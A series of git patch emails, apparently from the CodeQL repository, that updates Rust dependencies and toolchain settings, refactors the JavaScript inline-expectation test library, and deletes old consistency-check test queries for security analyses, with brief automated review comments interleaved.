@@ -130,9 +130,9 @@ checksum = "baf1de4339761588bc0619e3cbc0120ee582ebb74b53b4efbf79117bd2da40fd" [[package]] name = "chrono" -version = "0.4.38" +version = "0.4.40" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "a21f936df1771bf62b77f047b726c4625ff2e8aa607c01ec06e5a05bd8463401" +checksum = "1a7964611d71df112cb1730f2ee67324fcf4d0fc6606acbbe9bfe06df124637c" dependencies = [ "android-tzdata", "iana-time-zone", @@ -140,7 +140,7 @@ dependencies = [ "num-traits", "serde", "wasm-bindgen", - "windows-targets", + "windows-link", ] [[package]] @@ -337,9 +337,9 @@ checksum = "a246d82be1c9d791c5dfde9a2bd045fc3cbba3fa2b11ad558f27d01712f00569" [[package]] name = "flate2" -version = "1.0.34" +version = "1.1.0" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "a1b589b4dc103969ad3cf85c950899926ec64300a1a46d76c03a6072957036f0" +checksum = "11faaf5a5236997af9848be0bef4db95824b1d534ebc64d0f0c6cf3e67bd38dc" dependencies = [ "crc32fast", "miniz_oxide", @@ -449,9 +449,9 @@ checksum = "78ca9ab1a0babb1e7d5695e3530886289c18cf2f87ec19a575a0abdce112e3a3" [[package]] name = "miniz_oxide" -version = "0.8.0" +version = "0.8.5" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "e2d80299ef12ff69b16a84bb182e3b9df68b5a91574d3d4fa6e41b65deec4df1" +checksum = "8e3e04debbb59698c15bacbb6d93584a8c0ca9cc3213cb423d31f760d8843ce5" dependencies = [ "adler2", ] @@ -679,9 +679,9 @@ dependencies = [ [[package]] name = "tracing" -version = "0.1.40" +version = "0.1.41" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "c3523ab5a71916ccf420eebdf5521fcef02141234bbc0b8a49f2fdc4544364ef" +checksum = "784e0ac535deb450455cbfa28a6f0df145ea1bb7ae51b821cf5e7927fdcfbdd0" dependencies = [ "pin-project-lite", "tracing-attributes", 
@@ -690,9 +690,9 @@ dependencies = [ [[package]] name = "tracing-attributes" -version = "0.1.27" +version = "0.1.28" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "34704c8d6ebcbc939824180af020566b01a7c01f80641264eba0999f6c2b6be7" +checksum = "395ae124c09f9e6918a2310af6038fba074bcf474ac352496d5910dd59a2226d" dependencies = [ "proc-macro2", "quote", @@ -701,9 +701,9 @@ dependencies = [ [[package]] name = "tracing-core" -version = "0.1.32" +version = "0.1.33" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "c06d3da6113f116aaee68e4d601191614c9053067f9ab7f6edbcb161237daa54" +checksum = "e672c95779cf947c5311f83787af4fa8fffd12fb27e4993211a84bdfd9610f9c" dependencies = [ "once_cell", "valuable", @@ -722,9 +722,9 @@ dependencies = [ [[package]] name = "tracing-subscriber" -version = "0.3.18" +version = "0.3.19" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "ad0f048c97dbd9faa9b7df56362b8ebcaa52adb06b498c050d2f4e32f90a7a8b" +checksum = "e8189decb5ac0fa7bc8b96b7cb9b2701d60d48805aca84a238004d665fcc4008" dependencies = [ "matchers", "nu-ansi-term", @@ -897,6 +897,12 @@ dependencies = [ "windows-targets", ] +[[package]] +name = "windows-link" +version = "0.1.0" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "6dccfd733ce2b1753b03b6d3c65edf020262ea35e20ccdf3e288043e6dd620e3" + [[package]] name = "windows-sys" version = "0.59.0" diff --git a/ql/Cargo.toml b/ql/Cargo.toml index 5e42fc8d5e50..3dca1c9fbca6 100644 --- a/ql/Cargo.toml +++ b/ql/Cargo.toml @@ -1,4 +1,5 @@ [workspace] +resolver = "2" members = [ "extractor", "buramu", diff --git a/ql/rust-toolchain.toml b/ql/rust-toolchain.toml deleted file mode 100644 index 699a593039b0..000000000000 --- a/ql/rust-toolchain.toml +++ /dev/null 
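Review bot: After this change nothing in `ql/Cargo.toml` states which Rust version the workspace is built and tested with. The same commit deletes `ql/rust-toolchain.toml`, whose comment described the pin as "the lowest version of Rust we want to support", and moves `Cargo.lock` to `version = 4`, a lockfile format that older Cargo releases do not read. If a toolchain file elsewhere in the repository now governs this workspace (not visible here), a comment beside the added `resolver = "2"` line would make that explicit, for example `# Toolchain is pinned by <path to the governing rust-toolchain.toml>`. Otherwise a `rust-version` entry in the manifests would keep the supported floor written down.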
@@ -1,7 +0,0 @@ -# This file specifies the Rust version used to develop and test the QL -# extractor. It is set to the lowest version of Rust we want to support. - -[toolchain] -channel = "1.74" -profile = "minimal" -components = [ "rustfmt" ] \ No newline at end of file From 79e2a758d76f143cd1c3ed2829065ca3fd3bd968 Mon Sep 17 00:00:00 2001 From: Asger F Date: Mon, 10 Feb 2025 13:27:46 +0100 Subject: [PATCH 044/892] JS: Allow more kinds of expectation comments --- .../test/internal/InlineExpectationsTestImpl.qll | 16 ++++++++++++---- 1 file changed, 12 insertions(+), 4 deletions(-) diff --git a/javascript/ql/lib/utils/test/internal/InlineExpectationsTestImpl.qll b/javascript/ql/lib/utils/test/internal/InlineExpectationsTestImpl.qll index 9e92f70af69f..42eb94230ae6 100644 --- a/javascript/ql/lib/utils/test/internal/InlineExpectationsTestImpl.qll +++ b/javascript/ql/lib/utils/test/internal/InlineExpectationsTestImpl.qll @@ -4,14 +4,22 @@ private import codeql.util.test.InlineExpectationsTest module Impl implements InlineExpectationsTestSig { private import javascript - final private class LineCommentFinal = LineComment; + final class ExpectationComment = ExpectationCommentImpl; - class ExpectationComment extends LineCommentFinal { - string getContents() { result = this.getText() } + class Location = JS::Location; + + abstract private class ExpectationCommentImpl extends Locatable { + abstract string getContents(); /** Gets this element's location. */ Location getLocation() { result = super.getLocation() } } - class Location = JS::Location; + private class JSComment extends ExpectationCommentImpl instanceof Comment { + override string getContents() { result = super.getText() } + } + + private class HtmlComment extends ExpectationCommentImpl instanceof HTML::CommentNode { + override string getContents() { result = super.getText() } + } } From 7e5c24a8ec732346b3e464d9bef92a1b6118b68e Mon Sep 17 00:00:00 2001 
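Review bot: The new abstract `getContents()` on `ExpectationCommentImpl` and the two subclasses `JSComment` and `HtmlComment` have no QLDoc, so the contract that implementations must meet is not stated. Suggested comments are `/** Gets the text of this comment, as returned by getText() on the underlying comment node. */` on `getContents()`, `/** A JavaScript comment of any kind, treated as a possible expectation comment. */` on `JSComment`, and `/** An HTML comment, treated as a possible expectation comment. */` on `HtmlComment`. Widening the base from `LineComment` to `Comment` also means comments other than line comments are now scanned for expectations. It may be worth confirming that existing security test files contain no block or doc comments with `$` text, since those would now be read as expectations and could change which alerts a test reports as missing or unexpected.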
From: Asger F Date: Tue, 4 Feb 2025 12:48:51 +0100 Subject: [PATCH 045/892] JS: Remove uses of old inline expectation test library --- .../CWE-022/TaintedPath/Consistency.expected | 0 .../CWE-022/TaintedPath/Consistency.ql | 9 -------- .../Security/CWE-073/Consistency.expected | 0 .../Security/CWE-073/Consistency.ql | 3 --- .../Security/CWE-078/Consistency.expected | 0 .../Security/CWE-078/Consistency.ql | 23 ------------------- .../ConsistencyDomBasedXss.expected | 0 .../DomBasedXss/ConsistencyDomBasedXss.ql | 9 -------- .../ConsistencyExceptionXss.expected | 0 .../ExceptionXss/ConsistencyExceptionXss.ql | 3 --- .../ConsistencyReflectedXss.expected | 0 .../ReflectedXss/ConsistencyReflectedXss.ql | 3 --- .../StoredXss/ConsistencyStoredXss.expected | 0 .../CWE-079/StoredXss/ConsistencyStoredXss.ql | 3 --- ...ConsistencyUnsafeHtmlConstruction.expected | 0 .../ConsistencyUnsafeHtmlConstruction.ql | 3 --- .../ConsistencyUnsafeJQueryPlugin.expected | 0 .../ConsistencyUnsafeJQueryPlugin.ql | 3 --- .../ConsistencyXssThroughDom.expected | 0 .../XssThroughDom/ConsistencyXssThroughDom.ql | 14 ----------- .../CWE-089/untyped/Consistency.expected | 0 .../Security/CWE-089/untyped/Consistency.ql | 4 ---- .../Security/CWE-502/Consistency.expected | 0 .../Security/CWE-502/Consistency.ql | 3 --- .../Consistency.expected | 0 .../ClientSideUrlRedirect/Consistency.ql | 9 -------- .../ResourceExhaustion/Consistency.expected | 0 .../CWE-770/ResourceExhaustion/Consistency.ql | 3 --- .../Consistency.expected | 1 - .../Consistency.ql | 16 ------------- 30 files changed, 109 deletions(-) delete mode 100644 javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/Consistency.expected delete mode 100644 javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/Consistency.ql delete mode 100644 javascript/ql/test/query-tests/Security/CWE-073/Consistency.expected delete mode 100644 javascript/ql/test/query-tests/Security/CWE-073/Consistency.ql delete mode 100644 
javascript/ql/test/query-tests/Security/CWE-078/Consistency.expected delete mode 100644 javascript/ql/test/query-tests/Security/CWE-078/Consistency.ql delete mode 100644 javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/ConsistencyDomBasedXss.expected delete mode 100644 javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/ConsistencyDomBasedXss.ql delete mode 100644 javascript/ql/test/query-tests/Security/CWE-079/ExceptionXss/ConsistencyExceptionXss.expected delete mode 100644 javascript/ql/test/query-tests/Security/CWE-079/ExceptionXss/ConsistencyExceptionXss.ql delete mode 100644 javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/ConsistencyReflectedXss.expected delete mode 100644 javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/ConsistencyReflectedXss.ql delete mode 100644 javascript/ql/test/query-tests/Security/CWE-079/StoredXss/ConsistencyStoredXss.expected delete mode 100644 javascript/ql/test/query-tests/Security/CWE-079/StoredXss/ConsistencyStoredXss.ql delete mode 100644 javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/ConsistencyUnsafeHtmlConstruction.expected delete mode 100644 javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/ConsistencyUnsafeHtmlConstruction.ql delete mode 100644 javascript/ql/test/query-tests/Security/CWE-079/UnsafeJQueryPlugin/ConsistencyUnsafeJQueryPlugin.expected delete mode 100644 javascript/ql/test/query-tests/Security/CWE-079/UnsafeJQueryPlugin/ConsistencyUnsafeJQueryPlugin.ql delete mode 100644 javascript/ql/test/query-tests/Security/CWE-079/XssThroughDom/ConsistencyXssThroughDom.expected delete mode 100644 javascript/ql/test/query-tests/Security/CWE-079/XssThroughDom/ConsistencyXssThroughDom.ql delete mode 100644 javascript/ql/test/query-tests/Security/CWE-089/untyped/Consistency.expected delete mode 100644 javascript/ql/test/query-tests/Security/CWE-089/untyped/Consistency.ql delete mode 100644 
javascript/ql/test/query-tests/Security/CWE-502/Consistency.expected delete mode 100644 javascript/ql/test/query-tests/Security/CWE-502/Consistency.ql delete mode 100644 javascript/ql/test/query-tests/Security/CWE-601/ClientSideUrlRedirect/Consistency.expected delete mode 100644 javascript/ql/test/query-tests/Security/CWE-601/ClientSideUrlRedirect/Consistency.ql delete mode 100644 javascript/ql/test/query-tests/Security/CWE-770/ResourceExhaustion/Consistency.expected delete mode 100644 javascript/ql/test/query-tests/Security/CWE-770/ResourceExhaustion/Consistency.ql delete mode 100644 javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingAssignment/Consistency.expected delete mode 100644 javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingAssignment/Consistency.ql diff --git a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/Consistency.expected b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/Consistency.expected deleted file mode 100644 index e69de29bb2d1..000000000000 diff --git a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/Consistency.ql b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/Consistency.ql deleted file mode 100644 index 0183ac6ade66..000000000000 --- a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/Consistency.ql +++ /dev/null @@ -1,9 +0,0 @@ -import javascript -import semmle.javascript.security.dataflow.TaintedPathQuery -deprecated import utils.test.ConsistencyChecking - -deprecated class TaintedPathConsistency extends ConsistencyConfiguration { - TaintedPathConsistency() { this = "TaintedPathConsistency" } - - override DataFlow::Node getAnAlert() { TaintedPathFlow::flowTo(result) } -} diff --git a/javascript/ql/test/query-tests/Security/CWE-073/Consistency.expected b/javascript/ql/test/query-tests/Security/CWE-073/Consistency.expected deleted file mode 100644 index e69de29bb2d1..000000000000 
diff --git a/javascript/ql/test/query-tests/Security/CWE-073/Consistency.ql b/javascript/ql/test/query-tests/Security/CWE-073/Consistency.ql deleted file mode 100644 index eae82dc052fe..000000000000 --- a/javascript/ql/test/query-tests/Security/CWE-073/Consistency.ql +++ /dev/null @@ -1,3 +0,0 @@ -import javascript -import semmle.javascript.security.dataflow.TemplateObjectInjectionQuery -deprecated import utils.test.ConsistencyChecking diff --git a/javascript/ql/test/query-tests/Security/CWE-078/Consistency.expected b/javascript/ql/test/query-tests/Security/CWE-078/Consistency.expected deleted file mode 100644 index e69de29bb2d1..000000000000 diff --git a/javascript/ql/test/query-tests/Security/CWE-078/Consistency.ql b/javascript/ql/test/query-tests/Security/CWE-078/Consistency.ql deleted file mode 100644 index 77e19c320dff..000000000000 --- a/javascript/ql/test/query-tests/Security/CWE-078/Consistency.ql +++ /dev/null 
@@ -1,23 +0,0 @@ -import javascript -deprecated import utils.test.ConsistencyChecking -import semmle.javascript.security.dataflow.CommandInjectionQuery as CommandInjection -import semmle.javascript.security.dataflow.IndirectCommandInjectionQuery as IndirectCommandInjection -import semmle.javascript.security.dataflow.ShellCommandInjectionFromEnvironmentQuery as ShellCommandInjectionFromEnvironment -import semmle.javascript.security.dataflow.UnsafeShellCommandConstructionQuery as UnsafeShellCommandConstruction -import semmle.javascript.security.dataflow.SecondOrderCommandInjectionQuery as SecondOrderCommandInjectionQuery - -deprecated class CommandInjectionConsistency extends ConsistencyConfiguration { - CommandInjectionConsistency() { this = "ComandInjection" } - - override File getAFile() { not result.getBaseName() = "uselesscat.js" } -} - -import semmle.javascript.security.UselessUseOfCat - -deprecated class UselessCatConsistency extends ConsistencyConfiguration { - UselessCatConsistency() { this = "Cat" } - - override DataFlow::Node getAnAlert() { result instanceof UselessCat } - - override File getAFile() { result.getBaseName() = "uselesscat.js" } -} diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/ConsistencyDomBasedXss.expected b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/ConsistencyDomBasedXss.expected deleted file mode 100644 index e69de29bb2d1..000000000000 diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/ConsistencyDomBasedXss.ql b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/ConsistencyDomBasedXss.ql deleted file mode 100644 index 87b27a68998c..000000000000 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/ConsistencyDomBasedXss.ql +++ /dev/null 
@@ -1,9 +0,0 @@ -import javascript -deprecated import utils.test.ConsistencyChecking -import semmle.javascript.security.dataflow.DomBasedXssQuery - -deprecated class ConsistencyConfig extends ConsistencyConfiguration { - ConsistencyConfig() { this = "ConsistencyConfig" } - - override DataFlow::Node getAnAlert() { DomBasedXssFlow::flow(_, result) } -} diff --git a/javascript/ql/test/query-tests/Security/CWE-079/ExceptionXss/ConsistencyExceptionXss.expected b/javascript/ql/test/query-tests/Security/CWE-079/ExceptionXss/ConsistencyExceptionXss.expected deleted file mode 100644 index e69de29bb2d1..000000000000 diff --git a/javascript/ql/test/query-tests/Security/CWE-079/ExceptionXss/ConsistencyExceptionXss.ql b/javascript/ql/test/query-tests/Security/CWE-079/ExceptionXss/ConsistencyExceptionXss.ql deleted file mode 100644 index ec505e62e171..000000000000 --- a/javascript/ql/test/query-tests/Security/CWE-079/ExceptionXss/ConsistencyExceptionXss.ql +++ /dev/null @@ -1,3 +0,0 @@ -import javascript -deprecated import utils.test.ConsistencyChecking -import semmle.javascript.security.dataflow.ExceptionXssQuery as ExceptionXss diff --git a/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/ConsistencyReflectedXss.expected b/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/ConsistencyReflectedXss.expected deleted file mode 100644 index e69de29bb2d1..000000000000 diff --git a/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/ConsistencyReflectedXss.ql b/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/ConsistencyReflectedXss.ql deleted file mode 100644 index 9019d53e10ed..000000000000 --- a/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/ConsistencyReflectedXss.ql +++ /dev/null @@ -1,3 +0,0 @@ -import javascript -deprecated import utils.test.ConsistencyChecking -import semmle.javascript.security.dataflow.ReflectedXssQuery as ReflectedXss 
diff --git a/javascript/ql/test/query-tests/Security/CWE-079/StoredXss/ConsistencyStoredXss.expected b/javascript/ql/test/query-tests/Security/CWE-079/StoredXss/ConsistencyStoredXss.expected deleted file mode 100644 index e69de29bb2d1..000000000000 diff --git a/javascript/ql/test/query-tests/Security/CWE-079/StoredXss/ConsistencyStoredXss.ql b/javascript/ql/test/query-tests/Security/CWE-079/StoredXss/ConsistencyStoredXss.ql deleted file mode 100644 index 38bae3a6aea6..000000000000 --- a/javascript/ql/test/query-tests/Security/CWE-079/StoredXss/ConsistencyStoredXss.ql +++ /dev/null @@ -1,3 +0,0 @@ -import javascript -deprecated import utils.test.ConsistencyChecking -import semmle.javascript.security.dataflow.StoredXssQuery as StoredXss diff --git a/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/ConsistencyUnsafeHtmlConstruction.expected b/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/ConsistencyUnsafeHtmlConstruction.expected deleted file mode 100644 index e69de29bb2d1..000000000000 diff --git a/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/ConsistencyUnsafeHtmlConstruction.ql b/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/ConsistencyUnsafeHtmlConstruction.ql deleted file mode 100644 index e67885e96b96..000000000000 --- a/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/ConsistencyUnsafeHtmlConstruction.ql +++ /dev/null @@ -1,3 +0,0 @@ -import javascript -deprecated import utils.test.ConsistencyChecking -import semmle.javascript.security.dataflow.UnsafeHtmlConstructionQuery as UnsafeHtmlConstruction diff --git a/javascript/ql/test/query-tests/Security/CWE-079/UnsafeJQueryPlugin/ConsistencyUnsafeJQueryPlugin.expected b/javascript/ql/test/query-tests/Security/CWE-079/UnsafeJQueryPlugin/ConsistencyUnsafeJQueryPlugin.expected deleted file mode 100644 index e69de29bb2d1..000000000000 
diff --git a/javascript/ql/test/query-tests/Security/CWE-079/UnsafeJQueryPlugin/ConsistencyUnsafeJQueryPlugin.ql b/javascript/ql/test/query-tests/Security/CWE-079/UnsafeJQueryPlugin/ConsistencyUnsafeJQueryPlugin.ql deleted file mode 100644 index d7e452b2a8c1..000000000000 --- a/javascript/ql/test/query-tests/Security/CWE-079/UnsafeJQueryPlugin/ConsistencyUnsafeJQueryPlugin.ql +++ /dev/null @@ -1,3 +0,0 @@ -import javascript -deprecated import utils.test.ConsistencyChecking -import semmle.javascript.security.dataflow.UnsafeJQueryPluginQuery as UnsafeJqueryPlugin diff --git a/javascript/ql/test/query-tests/Security/CWE-079/XssThroughDom/ConsistencyXssThroughDom.expected b/javascript/ql/test/query-tests/Security/CWE-079/XssThroughDom/ConsistencyXssThroughDom.expected deleted file mode 100644 index e69de29bb2d1..000000000000 diff --git a/javascript/ql/test/query-tests/Security/CWE-079/XssThroughDom/ConsistencyXssThroughDom.ql b/javascript/ql/test/query-tests/Security/CWE-079/XssThroughDom/ConsistencyXssThroughDom.ql deleted file mode 100644 index 547763a8f838..000000000000 --- a/javascript/ql/test/query-tests/Security/CWE-079/XssThroughDom/ConsistencyXssThroughDom.ql +++ /dev/null @@ -1,14 +0,0 @@ -import javascript -deprecated import utils.test.ConsistencyChecking -import semmle.javascript.security.dataflow.XssThroughDomQuery - -deprecated class ConsistencyConfig extends ConsistencyConfiguration { - ConsistencyConfig() { this = "ConsistencyConfig" } - - override DataFlow::Node getAnAlert() { - exists(DataFlow::Node source | - XssThroughDomFlow::flow(source, result) and - not isIgnoredSourceSinkPair(source, result) - ) - } -} diff --git a/javascript/ql/test/query-tests/Security/CWE-089/untyped/Consistency.expected b/javascript/ql/test/query-tests/Security/CWE-089/untyped/Consistency.expected deleted file mode 100644 index e69de29bb2d1..000000000000 
diff --git a/javascript/ql/test/query-tests/Security/CWE-089/untyped/Consistency.ql b/javascript/ql/test/query-tests/Security/CWE-089/untyped/Consistency.ql deleted file mode 100644 index 9c721994d677..000000000000 --- a/javascript/ql/test/query-tests/Security/CWE-089/untyped/Consistency.ql +++ /dev/null @@ -1,4 +0,0 @@ -import javascript -deprecated import utils.test.ConsistencyChecking -import semmle.javascript.security.dataflow.SqlInjectionQuery as SqlInjection -import semmle.javascript.security.dataflow.NosqlInjectionQuery as NosqlInjection diff --git a/javascript/ql/test/query-tests/Security/CWE-502/Consistency.expected b/javascript/ql/test/query-tests/Security/CWE-502/Consistency.expected deleted file mode 100644 index e69de29bb2d1..000000000000 diff --git a/javascript/ql/test/query-tests/Security/CWE-502/Consistency.ql b/javascript/ql/test/query-tests/Security/CWE-502/Consistency.ql deleted file mode 100644 index 6c43567b5c45..000000000000 --- a/javascript/ql/test/query-tests/Security/CWE-502/Consistency.ql +++ /dev/null @@ -1,3 +0,0 @@ -import javascript -import semmle.javascript.security.dataflow.UnsafeDeserializationQuery -deprecated import utils.test.ConsistencyChecking diff --git a/javascript/ql/test/query-tests/Security/CWE-601/ClientSideUrlRedirect/Consistency.expected b/javascript/ql/test/query-tests/Security/CWE-601/ClientSideUrlRedirect/Consistency.expected deleted file mode 100644 index e69de29bb2d1..000000000000 diff --git a/javascript/ql/test/query-tests/Security/CWE-601/ClientSideUrlRedirect/Consistency.ql b/javascript/ql/test/query-tests/Security/CWE-601/ClientSideUrlRedirect/Consistency.ql deleted file mode 100644 index e02e59dcb19a..000000000000 --- a/javascript/ql/test/query-tests/Security/CWE-601/ClientSideUrlRedirect/Consistency.ql +++ /dev/null 
@@ -1,9 +0,0 @@ -import javascript -import semmle.javascript.security.dataflow.ClientSideUrlRedirectQuery -import utils.test.ConsistencyChecking - -deprecated class ClientSideUrlRedirectConsistency extends ConsistencyConfiguration { - ClientSideUrlRedirectConsistency() { this = "ClientSideUrlRedirectConsistency" } - - override DataFlow::Node getAnAlert() { ClientSideUrlRedirectFlow::flowTo(result) } -} diff --git a/javascript/ql/test/query-tests/Security/CWE-770/ResourceExhaustion/Consistency.expected b/javascript/ql/test/query-tests/Security/CWE-770/ResourceExhaustion/Consistency.expected deleted file mode 100644 index e69de29bb2d1..000000000000 diff --git a/javascript/ql/test/query-tests/Security/CWE-770/ResourceExhaustion/Consistency.ql b/javascript/ql/test/query-tests/Security/CWE-770/ResourceExhaustion/Consistency.ql deleted file mode 100644 index a5da63e682d0..000000000000 --- a/javascript/ql/test/query-tests/Security/CWE-770/ResourceExhaustion/Consistency.ql +++ /dev/null @@ -1,3 +0,0 @@ -import javascript -import semmle.javascript.security.dataflow.ResourceExhaustionQuery -deprecated import utils.test.ConsistencyChecking diff --git a/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingAssignment/Consistency.expected b/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingAssignment/Consistency.expected deleted file mode 100644 index 8efa3a055b19..000000000000 --- a/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingAssignment/Consistency.expected +++ /dev/null @@ -1 +0,0 @@ -| lib.js:70 | expected an alert, but found none | NOT OK | Config | diff --git a/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingAssignment/Consistency.ql b/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingAssignment/Consistency.ql deleted file mode 100644 index d80f9d23ff52..000000000000 --- a/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingAssignment/Consistency.ql +++ /dev/null 
@@ -1,16 +0,0 @@
-import javascript
-deprecated import utils.test.ConsistencyChecking
-import semmle.javascript.security.dataflow.PrototypePollutingAssignmentQuery
-
-deprecated class Config extends ConsistencyConfiguration {
- Config() { this = "Config" }
-
- override File getAFile() { any() }
-
- override DataFlow::Node getAnAlert() {
- exists(DataFlow::Node source |
- PrototypePollutingAssignmentFlow::flow(source, result) and
- not isIgnoredLibraryFlow(source, result)
- )
- }
-}
From 9be041e27da36e8ccb2062e8a59be0478e3fa141 Mon Sep 17 00:00:00 2001
From: Asger F Date: Thu, 6 Feb 2025 13:34:01 +0100 Subject: [PATCH 046/892] JS: Update OK-style comments to $-style --- .../DeadAngularJSEventListener/tst.js | 26 +- .../AngularJS/DependencyMismatch/tst.js | 16 +- .../AngularJS/DisablingSce/DisablingSce.js | 10 +- .../angular-incompatible-service.js | 116 +++---- .../AngularJS/InsecureUrlWhitelist/tst.js | 30 +- .../missing-explicit-injection.js | 22 +- .../RepeatedInjection/repeated-injection.js | 20 +- .../unused-angular-dependency.js | 20 +- .../query-tests/AngularJS/UseNgSrc/tst.html | 5 +- .../query-tests/AngularJS/UseNgSrc/tst2.html | 3 +- .../AngularJS/UseNgSrc/tst_fragment.html | 3 +- .../query-tests/Comments/TodoComments/tst.js | 2 +- .../ql/test/query-tests/DOM/Alert/alert.js | 8 +- .../ql/test/query-tests/DOM/HTML/tst.js | 22 +- .../test/query-tests/DOM/TargetBlank/tst.js | 29 +- .../Declarations/ArgumentsRedefined/tst.js | 4 +- .../ArgumentsRedefined/types.d.ts | 4 +- .../Declarations/AssignmentToConst/classes.js | 3 +- .../Declarations/AssignmentToConst/const6.js | 2 +- .../AssignmentToConst/functions.js | 3 +- .../Declarations/AssignmentToConst/other.js | 2 +- .../Declarations/AssignmentToConst/tst.js | 16 +- .../Declarations/ClobberingVarInit/tst.js | 7 +- .../Declarations/DeadStoreOfGlobal/tst.js | 17 +- .../DeadStoreOfLocal/computedFieldNames.ts | 4 +- .../computedInterfaceProperty.ts | 10 +- .../DeadStoreOfLocal/exportDefaultClass.ts | 4 +- .../DeadStoreOfLocal/exportDefaultFunction.ts | 2 +- .../Declarations/DeadStoreOfLocal/extends.js | 2 +- .../DeadStoreOfLocal/for-of-continue.js | 2 +- .../DeadStoreOfLocal/namespace.ts | 2 +- .../Declarations/DeadStoreOfLocal/overload.ts | 12 +- .../Declarations/DeadStoreOfLocal/tst.js | 36 +- .../Declarations/DeadStoreOfLocal/tst2.js | 7 +- .../Declarations/DeadStoreOfLocal/tst3.js | 3 +- .../Declarations/DeadStoreOfLocal/tst3b.js | 3 +- .../DeadStoreOfProperty/accessors.js | 8 +- .../DeadStoreOfProperty/exports.js | 2 +- .../DeadStoreOfProperty/fieldInit.ts 
| 6 +- .../real-world-examples.js | 10 +- .../Declarations/DeadStoreOfProperty/tst.js | 38 +-- .../Declarations/DeclBeforeUse/jslint.js | 8 +- .../Declarations/DeclBeforeUse/tst2.js | 6 +- .../Declarations/DeclBeforeUse/typescript.ts | 4 +- .../Declarations/DuplicateVarDecl/tst.js | 5 +- .../IneffectiveParameterType/tst.js | 2 +- .../IneffectiveParameterType/tst.ts | 22 +- .../MissingThisQualifier/abstract-missing.ts | 2 +- .../ignored-by-externs.js | 2 +- .../MissingThisQualifier/ignored-by-jslint.js | 2 +- .../MissingThisQualifier/indirection.js | 4 +- .../MissingThisQualifier/missing1.js | 2 +- .../MissingThisQualifier/missing2.js | 2 +- .../MissingThisQualifier/namespaces-uses.ts | 38 +-- .../MissingThisQualifier/non-global.js | 2 +- .../not-ignored-by-jslint.js | 2 +- .../MissingThisQualifier/present1.js | 2 +- .../MissingThisQualifier/present2.js | 2 +- .../Declarations/MissingVarDecl/test.js | 30 +- .../MixedStaticInstanceThisAccess/abstract.ts | 2 +- .../instanceInstance.js | 2 +- .../instanceInstanceWithStaticExtra.js | 2 +- .../instanceStatic.js | 2 +- .../staticInstance.js | 2 +- .../staticStatic.js | 2 +- .../staticStaticWithInstanceExtra.js | 2 +- .../throughClass.js | 2 +- .../MixedStaticInstanceThisAccess/tst.js | 12 +- .../RedeclaredVariable/externs.js | 2 +- .../Declarations/RedeclaredVariable/tst.js | 2 +- .../Declarations/RedeclaredVariable/tst.ts | 6 +- .../Declarations/RedeclaredVariable/tst3.js | 2 +- .../Declarations/RedeclaredVariable/tst4.js | 8 +- .../SuspiciousMethodNameDeclaration/tst.js | 2 +- .../SuspiciousMethodNameDeclaration/tst.ts | 22 +- .../Declarations/TemporalDeadZone/tst.js | 15 +- .../Declarations/TooManyParameters/externs.js | 2 +- .../Declarations/UniqueParameterNames/tst.js | 10 +- .../Declarations/UniquePropertyNames/tst.js | 6 +- .../Declarations/UnreachableOverloads/tst.ts | 20 +- .../Declarations/UnstableCyclicImport/A.ts | 2 +- .../Declarations/UnstableCyclicImport/B.ts | 2 +- .../UnstableCyclicImport/acyclicImport.ts 
